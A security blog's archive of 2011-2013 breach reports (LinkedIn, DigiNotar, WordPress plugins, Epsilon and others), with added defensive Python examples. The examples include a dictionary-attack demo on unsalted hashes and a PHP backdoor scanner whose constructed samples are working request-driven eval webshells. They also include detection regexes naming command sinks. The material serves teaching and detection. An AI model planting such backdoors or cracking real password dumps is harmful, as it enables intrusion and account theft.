Tag Archives: Hack

Twitter “attack was not the work of amateurs”

Bits from Bill
February 02, 2013
Updating your Twitter Password Isn’t Enough

Today, the public news report is that information from approximately 250,000 Twitter accounts was stolen. Twitter has taken action but I recommend you do more than just change your password. Even if you don’t use Twitter this attack may still affect you.

Continue reading: http://billpstudios.blogspot.com/2013/02/updating-your-twitter-password-isnt.html

LinkedIn Hack

ESET Threat Blog

Several people have notified us that they received emails today asking them to confirm their LinkedIn email addresses and we have determined that these are a scam. We are investigating the exact details but in the meantime please DO NOT CLICK on links in email to change or verify account information, at LinkedIn.com or on any other membership site. Instead, navigate to the site directly by typing in the address bar in your browser.

http://blog.eset.com/2012/06/06/linkedin-security-woes-and-what-to-do-about-it

Please don’t use the same password at every site: create a unique password for each one, and don’t make your password “password”.

Yes, people do that…

http://techland.time.com/2011/11/22/the-25-most-popular-and-worst-passwords-of-2011/

http://certifiedbug.com/blog/2012/06/06/millions-of-linkedin-passwords-reportedly-leaked/

Millions of LinkedIn passwords reportedly leaked

It is being widely reported that a file of 6.5 million hashed LinkedIn passwords (unsalted SHA-1 digests, not encrypted passwords) was dumped onto a Russian hacker forum.

“Sophos researchers have confirmed that the file does contain, at least in part, LinkedIn passwords.”
http://nakedsecurity.sophos.com/2012/06/06/millions-of-linkedin-passwords-reportedly-leaked-take-action-now/

More than 200,000 of these passwords have reportedly been cracked so far. The file only contains passwords hashed using the SHA-1 algorithm and does not include user names or any other data, security researchers say. However, the breach is so serious that security professionals are advising people to change their LinkedIn passwords immediately.

http://www.pcworld.com/article/257045/65m_linkedin_passwords_posted_online_after_apparent_hack.html

If you use this service, change your LinkedIn password immediately, make it strong, use a different password at every site, and, if you reused the old LinkedIn password anywhere else, change it there as well.

http://www.microsoft.com/security/online-privacy/passwords-create.aspx

Bad week for LinkedIn.

LinkedOut – A LinkedIn Privacy Issue

LinkedIn’s mobile application has an interesting feature that allows users to view their iOS calendars within the app. However, it turns out that LinkedIn have decided to send detailed calendar entries of users to their servers. The app doesn’t only send the participant lists of meetings; it also sends out the subject, location, time of meeting and more importantly personal meeting notes, which tend to contain highly sensitive information such as conference call details and passcodes. If you have decided to opt in to this calendar feature on iPhone, LinkedIn will automatically receive your calendar entries and will continue doing so every time you open your LinkedIn app.

http://blog.skycure.com/2012/06/linkedout-linkedin-privacy-issue.html

Update

An Update on LinkedIn Member Passwords Compromised
Vicente Silveira, June 6, 2012

We want to provide you with an update on this morning’s reports of stolen passwords. We can confirm that some of the passwords that were compromised correspond to LinkedIn accounts. We are continuing to investigate this situation and here is what we are pursuing as far as next steps for the compromised accounts: Members that have accounts associated with the compromised passwords will notice that their LinkedIn account password is no longer valid. These members will also receive an email from LinkedIn with instructions on how to reset their passwords. There will not be any links in this email. Once you follow this step and request password assistance, then you will receive an email from LinkedIn with a password reset link. These affected members will receive a second email from our Customer Support team providing a bit more context on this situation and why they are being asked to change their passwords.

It is worth noting that the affected members who update their passwords and members whose passwords have not been compromised benefit from the enhanced security we just recently put in place, which includes hashing and salting of our current password databases.

http://blog.linkedin.com/2012/06/06/linkedin-member-passwords-compromised/
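
Why 200,000 of the unsalted SHA-1 hashes fell so quickly, and what the “hashing and salting” in LinkedIn’s update actually changes, as an added example. This is illustrative code written for this post, not LinkedIn’s or any of the quoted sources’ code; the wordlist, the three-account “leak”, and the choice of PBKDF2-HMAC-SHA256 as the salted scheme are all assumptions of the example (LinkedIn did not say which algorithm it adopted).

```python
import hashlib
import hmac
import os
from typing import Dict, List, Optional, Tuple

# Constructed wordlist: a few entries of the kind found on "worst passwords" lists.
WORDLIST = ["password", "123456", "12345678", "qwerty", "abc123", "letmein", "linkedin", "dragon"]


def sha1_unsalted(password: str) -> str:
    """The scheme in the leaked file: one bare SHA-1 per password, no salt."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def crack_unsalted(leaked: List[str], wordlist: List[str]) -> Dict[str, str]:
    """Dictionary attack on unsalted hashes.

    Identical passwords give identical hashes, so one precomputed table serves
    every account in the dump at once: the cost is one SHA-1 per candidate word,
    not one per candidate per account. Returns {hash: recovered_password}.
    """
    table = {sha1_unsalted(w): w for w in wordlist}
    return {h: table[h] for h in leaked if h in table}


# Salted, iterated hashing from the standard library. PBKDF2 is this example's
# choice; the iteration count is a work factor the attacker must pay per guess.
ITERATIONS = 100_000


def hash_salted(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Return (salt, digest); a fresh random 16-byte salt is drawn when none is given."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return salt, digest


def verify_salted(password: str, salt: bytes, digest: bytes) -> bool:
    """Constant-time comparison, so timing does not leak how many bytes matched."""
    return hmac.compare_digest(hash_salted(password, salt)[1], digest)


def crack_salted(records: List[Tuple[bytes, bytes]], wordlist: List[str]) -> Tuple[int, Dict[int, str]]:
    """The same dictionary attack against salted records.

    No shared table is possible: each candidate must be re-hashed under each
    account's own salt, and every attempt costs ITERATIONS rounds instead of one.
    Returns (number_of_pbkdf2_evaluations, {record_index: recovered_password}).
    """
    found: Dict[int, str] = {}
    work = 0
    for idx, (salt, digest) in enumerate(records):
        for word in wordlist:
            work += 1
            if hmac.compare_digest(hash_salted(word, salt)[1], digest):
                found[idx] = word
                break
    return work, found


def demo() -> dict:
    """Constructed 'leak' of three accounts; two of them chose the same weak password."""
    passwords = ["password", "Tr0ub4dor&3-correct-horse", "password"]
    unsalted_dump = [sha1_unsalted(p) for p in passwords]
    cracked = crack_unsalted(unsalted_dump, WORDLIST)
    salted_records = [hash_salted(p) for p in passwords]
    work, found = crack_salted(salted_records, WORDLIST)
    return {
        "distinct_unsalted_hashes": len(set(unsalted_dump)),  # 2: accounts 0 and 2 collide
        "cracked_unsalted": cracked,                          # the shared hash, cracked once
        "salted_work": work,                                  # PBKDF2 calls spent: 1 + 8 + 1 = 10
        "cracked_salted": found,                              # {0: 'password', 2: 'password'}
    }


if __name__ == "__main__":
    print(demo())
```

The weak passwords are still recovered in the salted case; salting does not rescue “password”. What it removes is the one-table-for-the-whole-dump shortcut, and the iteration count makes each remaining guess cost tens of thousands of hash rounds rather than one.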

Zappos hack exposes personal information

Beta News
By Ed Oswald

Data on up to 24 million customers of online shoe retailer Zappos was compromised according to an email sent by its CEO Tony Hsieh on Sunday. While Hsieh says that full credit card information is safe, hackers may have the last four digits of the cards.

Hackers accessed names, email addresses, physical addresses, and phone numbers. Passwords were also compromised, however in encrypted form. As a result, the company sent out an email to all its customers, advising them to change their passwords as a protective measure. Zappos is also asking customers to reset their passwords elsewhere where it may be the same.

http://betanews.com/2012/01/16/zappos-hack-exposes-personal-information-of-24-million-customers/

DigiNotar SSL Certificate Hack

Microsoft Security Advisory (2607712)
Fraudulent Digital Certificates Could Allow Spoofing
Published: August 29, 2011 | Updated: August 29, 2011

Microsoft is aware of at least one fraudulent digital certificate issued by DigiNotar, a certification authority present in the Trusted Root Certification Authorities Store, on all supported releases of Microsoft Windows. Although this is not a vulnerability in a Microsoft product, Microsoft is taking action to protect customers.

Microsoft has been able to confirm that one digital certificate affects all subdomains of google.com and may be used to spoof content, perform phishing attacks, or perform man-in-the-middle attacks against all Web browser users including users of Internet Explorer. Microsoft is continuing to investigate how many more certificates have been fraudulently issued. As a precautionary measure, Microsoft has removed the DigiNotar root certificate from the Microsoft Certificate Trust List.

All supported editions of Windows Vista, Windows 7, Windows Server 2008, and Windows Server 2008 R2 use the Microsoft Certificate Trust List to validate the trust of a certification authority. Users of these operating systems will be presented with an invalid certificate error when they browse to a Web site or try to install programs signed by the DigiNotar root certificate. In those cases users should follow the instructions in the message. Microsoft will release a future update to address this issue for all supported editions of Windows XP and Windows Server 2003.

Microsoft is continuing to investigate this issue and may release future updates to help protect customers.

http://www.microsoft.com/technet/security/advisory/2607712.mspx

Edit
V3.0 (September 6, 2011): Revised to announce the release of an update that addresses this issue.

Computerworld

Hackers may have obtained more than 200 digital certificates from a Dutch company after breaking into its network, including ones for Mozilla, Yahoo and the Tor project, a security researcher reported today.

The count is considerably higher than DigiNotar has acknowledged. Earlier this week, a company spokesman said that “several dozen” certificates had been acquired by the attackers.

http://www.computerworld.com/s/article/9219663/Hackers_may_have_stolen_over_200_SSL_certificates

Mac OS X can’t properly revoke dodgy digital certificates
http://www.computerworld.com/s/article/9219669/Mac_OS_X_can_t_properly_revoke_dodgy_digital_certificates

Firefox and Thunderbird 6.0.1 were released after the Mozilla team removed DigiNotar from its root program to protect users.
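
A check a practitioner would want after reading the advisory: is a distrusted root still present in the trust store an application actually uses? The example below is added here and is not code from Microsoft, Mozilla or any of the sources quoted above. It reads the root store that Python’s ssl module loads by default, matches on the organisation name, and reports SHA-256 fingerprints so that hits can be compared against the vendor’s list; the sample store entries are constructed, not real certificates.

```python
import hashlib
import ssl
from typing import List, Tuple

# Organisations whose roots should not be trusted. "DigiNotar" is the CA named
# in the advisory; nothing else is on this list.
DISTRUSTED_ORGS = {"DigiNotar"}


def subject_field(cert: dict, field: str) -> str:
    """Read one attribute from the nested-tuple 'subject' that ssl.get_ca_certs() returns."""
    for rdn in cert.get("subject", ()):
        for key, value in rdn:
            if key == field:
                return value
    return ""


def find_distrusted(certs: List[dict], distrusted_orgs=DISTRUSTED_ORGS) -> List[Tuple[str, str]]:
    """(organizationName, commonName) of every root whose organisation is on the distrust list.

    Matching on names is only a first pass: anyone can put 'DigiNotar' in a
    subject. Compare fingerprints (below) against the vendor advisory before acting.
    """
    hits = []
    for cert in certs:
        org = subject_field(cert, "organizationName")
        if any(bad.lower() in org.lower() for bad in distrusted_orgs):
            hits.append((org, subject_field(cert, "commonName")))
    return hits


def fingerprint_sha256(der: bytes) -> str:
    """SHA-256 over the DER encoding, the form vendor advisories usually publish."""
    return hashlib.sha256(der).hexdigest()


def audit_default_store() -> List[Tuple[str, str, str]]:
    """Scan the platform root store Python's ssl module loads by default.

    Assumption (true in CPython): get_ca_certs() with and without binary_form
    walk the store in the same order, so the two lists can be zipped.
    """
    ctx = ssl.create_default_context()
    report = []
    for cert, der in zip(ctx.get_ca_certs(), ctx.get_ca_certs(binary_form=True)):
        if find_distrusted([cert]):
            org = subject_field(cert, "organizationName")
            cn = subject_field(cert, "commonName")
            report.append((org, cn, fingerprint_sha256(der)))
    return report


# Constructed sample in the same shape ssl returns; these are not real certificates.
SAMPLE_STORE = [
    {"subject": ((("countryName", "NL"),), (("organizationName", "DigiNotar"),),
                 (("commonName", "DigiNotar Root CA"),)),
     "notAfter": "Mar 31 18:19:21 2025 GMT"},
    {"subject": ((("organizationName", "Example Trust Services (constructed)"),),
                 (("commonName", "Example Root CA"),)),
     "notAfter": "Jan  1 00:00:00 2030 GMT"},
]


if __name__ == "__main__":
    print("sample store hits:", find_distrusted(SAMPLE_STORE))
    print("default store hits:", audit_default_store())
```

Note that this only covers the OpenSSL-backed store Python sees. Browsers carry their own root programs (Mozilla’s NSS store, in the Firefox case above), and on Windows the Certificate Trust List is consulted by the platform, so each store that a machine actually uses has to be audited on its own.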


WordPress warns of trojaned plugins

WordPress News
June 21, 2011

Earlier today the WordPress team noticed suspicious commits to several popular plugins (AddThis, WPtouch, and W3 Total Cache) containing cleverly disguised backdoors. We determined the commits were not from the authors, rolled them back, pushed updates to the plugins, and shut down access to the plugin repository while we looked for anything else unsavory.

We’re still investigating what happened, but as a prophylactic measure we’ve decided to force-reset all passwords on WordPress.org. To use the forums, trac, or commit to a plugin or theme, you’ll need to reset your password to a new one. (Same for bbPress.org and BuddyPress.org.)

http://wordpress.org/news/2011/06/passwords-reset/
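
The WordPress post does not show what the “cleverly disguised backdoors” looked like, so the plugin samples below are constructed, but they illustrate the kind of static check one can run over a plugin tree before trusting an update. This is an added example, not WordPress.org’s own tooling; the indicator regexes and their weights are this example’s choices and will produce false positives on legitimate code that uses eval or dynamic calls, so the score is for triage, not a verdict.

```python
import re
from typing import Dict, List, Tuple

Finding = Tuple[int, str, int]  # (line number, indicator name, weight)

# Heuristic indicators of a PHP backdoor. Regexes and weights are this example's own.
INDICATORS = [
    ("eval",                   re.compile(r"\beval\s*\("), 3),
    ("decode_or_inflate",      re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("), 2),
    # request data flowing straight into a code/command sink on the same statement
    ("superglobal_to_sink",    re.compile(r"\b(eval|assert|create_function|system|exec|passthru|shell_exec)\s*\([^;]*\$_(GET|POST|REQUEST|COOKIE)\b"), 5),
    # $name($_GET[...]): a function chosen at runtime, fed by the request
    ("superglobal_to_dyncall", re.compile(r"\$\w+\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b"), 4),
    ("dynamic_call",           re.compile(r"\$\w+\s*\(\s*\$\w+"), 1),
    # preg_replace with the /e modifier evaluates the replacement as PHP code
    ("preg_replace_e",         re.compile(r"preg_replace\s*\(\s*['\"]/[^'\"]*/[a-zA-Z]*e[a-zA-Z]*['\"]"), 4),
    ("long_base64_literal",    re.compile(r"['\"][A-Za-z0-9+/]{60,}={0,2}['\"]"), 2),
]

# Names a backdoor may hide by reversing: strrev('lave') == 'eval'
DANGEROUS_NAMES = {"eval", "assert", "base64_decode", "gzinflate", "system",
                   "exec", "passthru", "shell_exec", "create_function"}
STRREV_LITERAL = re.compile(r"strrev\s*\(\s*['\"]([^'\"]+)['\"]\s*\)")


def scan_source(php: str) -> List[Finding]:
    """Run every indicator over each line; a line can trigger several of them."""
    findings: List[Finding] = []
    for lineno, line in enumerate(php.splitlines(), start=1):
        for name, pattern, weight in INDICATORS:
            for _ in pattern.finditer(line):
                findings.append((lineno, name, weight))
        for m in STRREV_LITERAL.finditer(line):
            reversed_name = m.group(1)[::-1]
            if reversed_name in DANGEROUS_NAMES:
                findings.append((lineno, "reversed_name:" + reversed_name, 3))
    return findings


def risk_score(findings: List[Finding]) -> int:
    return sum(weight for _, _, weight in findings)


def triage(sources: Dict[str, str]) -> List[Tuple[str, int]]:
    """Rank files by score, highest first, so a reviewer reads the worst one first."""
    scored = [(name, risk_score(scan_source(text))) for name, text in sources.items()]
    return sorted(scored, key=lambda item: (-item[1], item[0]))


# Constructed plugin sources; none of these is a real WordPress plugin.
CLEAN = r"""<?php
/*
Plugin Name: Clean Example (constructed sample)
*/
function clean_example_title($title) {
    return esc_html($title);
}
add_filter('the_title', 'clean_example_title');
"""

TROJANED = r"""<?php
/*
Plugin Name: Example Widget (constructed sample)
*/
function ex_widget_init() { add_action('init', 'ex_widget_hook'); }
// Comment says "cache warm-up"; the body runs whatever the request supplies.
function ex_widget_hook() {
    if (isset($_REQUEST['ex_cache'])) {
        eval(base64_decode($_REQUEST['ex_cache']));
    }
}
"""

DISGUISED = r"""<?php
$k = 'ev' . 'al';
$d = strrev('edoced_46esab');
$k($d($_COOKIE['wp_sess']));
"""


if __name__ == "__main__":
    for name, score in triage({"clean.php": CLEAN, "widget.php": TROJANED, "disguised.php": DISGUISED}):
        print(f"{score:3d}  {name}")
```

The disguised sample is why a plain grep for `eval(` is not enough: the function names are assembled at runtime, and the only textual clue is the reversed literal and the request data being passed to a variable function. A scan like this belongs next to, not instead of, comparing the plugin files against the checksums of the release you meant to install.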

iTunes hack

Betanews

iTunes hack goes global, new affected games identified

With Apple all but silent on the issue, it has been difficult to determine what may be the source of the problem. However, with the quantity of reports received now numbering over three dozen, a pattern has emerged: every game targeted is a free download, and the fraudulent charges are all due to in-app purchases.

For this reason, Betanews now has reason to believe that this particular hack affecting iTunes is likely sourced to an exploit existing in Apple’s in-app purchasing mechanism. It is the only similarity between every report received.

http://www.betanews.com/article/iTunes-hack-goes-global-new-affected-games-identified/1307564070?

iTunes hack widespread, and Apple appears to know about it

From the reports a pattern is emerging. Nearly every victim had a gift card balance on their account, and some have reported that their credit card and/or payment information had been removed from their account. This indicates that Apple likely is aware of the attacks, and is actively trying to protect its users.

http://www.betanews.com/article/iTunes-hack-widespread-and-Apple-appears-to-know-about-it/1307390216

Epsilon Breach

No April Fools’ Day joke: on Friday, Dallas-based online marketing firm Epsilon said that its system had been breached.

Epsilon Notifies Clients of Unauthorized Entry into Email System
IRVING, TEXAS – April 1, 2011 – On March 30th, an incident was detected where a subset* of Epsilon clients’ customer data were exposed by an unauthorized entry into Epsilon’s email system. The information that was obtained was limited to email addresses and/or customer names only. A rigorous assessment determined that no other personal identifiable information associated with those names was at risk. A full investigation is currently underway.

* Updated April 4, 2011: The affected clients are approximately 2 percent of total clients and are a subset of clients for which Epsilon provides email services.

http://www.epsilon.com/News%20&%20Events/Press_Releases_2011/Epsilon_Notifies_Clients_of_Unauthorized_Entry_into_Email_System/p1057-l3

That 2 percent figure seems very low.

Mashable

A huge security breach has exposed the names and email addresses of customers of major brands, including Target, Best Buy, Walgreen’s, Capital One and more.

UPDATE: Apparently, a slew of hotel chains’ rewards programs have also been hit by the Epsilon breach; affected chains include Hilton, Red Roof Inn, Ritz-Carlton and Marriott.

List at Mashable: http://mashable.com/2011/04/04/epsilon-data-breach/

I received an email from a company I have done business with in the past in which they informed me of a system breach at Epsilon and warned that e-mail addresses can be used for “phishing” attacks.

http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx
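
ESET’s advice earlier on this page (don’t click links in mail; type the address yourself) and the phishing warning here come down to one check: where does the link actually go, as opposed to where it claims to go? The example below is added here and is not code from ESET, Microsoft or any other source on this page. The sample links are constructed, and the domain comparison uses a simplified last-two-labels rule rather than the Public Suffix List, which is an assumption a real deployment should replace.

```python
import ipaddress
from typing import List
from urllib.parse import urlsplit


def registrable_domain(host: str) -> str:
    """Last two labels of a hostname (example.com).

    Assumption: plain two-label TLDs. Use the Public Suffix List in production
    so that 'co.uk' style suffixes are handled correctly.
    """
    labels = host.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def check_link(url: str, expected_domain: str) -> dict:
    """Decide whether a link in an e-mail really leads to expected_domain."""
    expected = expected_domain.lower()
    brand = expected.split(".")[0]              # e.g. 'linkedin'
    parts = urlsplit(url)
    host = (parts.hostname or "").rstrip(".")   # hostname excludes userinfo and port
    reasons: List[str] = []
    if parts.scheme not in ("http", "https"):
        reasons.append("not a web link (scheme %r)" % parts.scheme)
    if parts.username is not None:
        # https://www.linkedin.com@evil.example/ : the part before '@' is a username
        reasons.append("text before '@' is a username, not the host; real host is %r" % host)
    try:
        ipaddress.ip_address(host)
        reasons.append("bare IP address instead of a hostname")
    except ValueError:
        pass
    if not host:
        reasons.append("no host")
    elif registrable_domain(host) != expected:
        reasons.append("host %r is not under %s" % (host, expected))
        if brand in host:
            reasons.append("uses the name %r as a lure inside another domain" % brand)
    return {"url": url, "host": host, "safe": not reasons, "reasons": reasons}


def display_text_mismatch(display_text: str, href: str) -> bool:
    """True when the visible link text names one domain but the href goes to another."""
    shown = display_text.strip()
    if " " in shown or "." not in shown:
        return False                            # 'Click here' names no domain
    if "://" not in shown:
        shown = "http://" + shown
    shown_host = urlsplit(shown).hostname or ""
    real_host = urlsplit(href).hostname or ""
    if not shown_host or not real_host:
        return False
    return registrable_domain(shown_host) != registrable_domain(real_host)


# Constructed sample links of the kind the warnings describe; none are real.
SAMPLE_LINKS = [
    "https://www.linkedin.com/settings/",
    "http://www.linkedin.com.account-verify.example/login",
    "https://www.linkedin.com@203.0.113.5/login",
    "https://secure-linkedin.example/reset",
    "https://www.linkedin.com",
]


def triage_links(links: List[str], expected_domain: str) -> List[tuple]:
    return [(u, check_link(u, expected_domain)["safe"]) for u in links]


if __name__ == "__main__":
    for url, safe in triage_links(SAMPLE_LINKS, "linkedin.com"):
        print("OK  " if safe else "BAD ", url)
```

The two functions answer different questions: `check_link` inspects the real destination, while `display_text_mismatch` catches the common trick of anchor text that reads as the genuine address while the href points elsewhere. Neither replaces the habit the ESET post recommends, which is to ignore the link and type the site’s address yourself.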

Play.com confirms breach

March 21, 2011 http://certifiedbug.com/blog/2011/03/21/play-com-customer-emails-leaked/

A message sent out to customers by Play.com:

Dear Customer,

Email Security Message

We are emailing all our customers to let you know that a company that handles part of our marketing communications has had a security breach. Unfortunately this has meant that some customer names and email addresses may have been compromised.

We take privacy and security very seriously and ensure all sensitive customer data is protected. Please be assured this issue has occurred outside of Play.com and no other personal customer information has been involved.

Please be assured we have taken every step to ensure this doesn’t happen again and accept our apologies for any inconvenience this may have caused some of you.

Customer Advice

Please do be vigilant with your email and personal information when using the internet. At Play.com we will never ask you for information such as passwords, bank account details or credit card numbers. If you receive anything suspicious in your email, please do not click on any links and forward the email on to privacy@play.com for us to investigate.

Thank you for continuing to shop at Play.com and we look forward to serving you in the future.

Play.com Customer Service Team

http://twitter.com/search?q=play.com%20spam

Do consider changing your Play.com password and the email account password associated with Play.com.

BBC News: Play.com warns of customer e-mail security breach
http://www.bbc.co.uk/news/technology-12819330

The retailer, which sells music, videos and games, blamed another company that it employs to do marketing.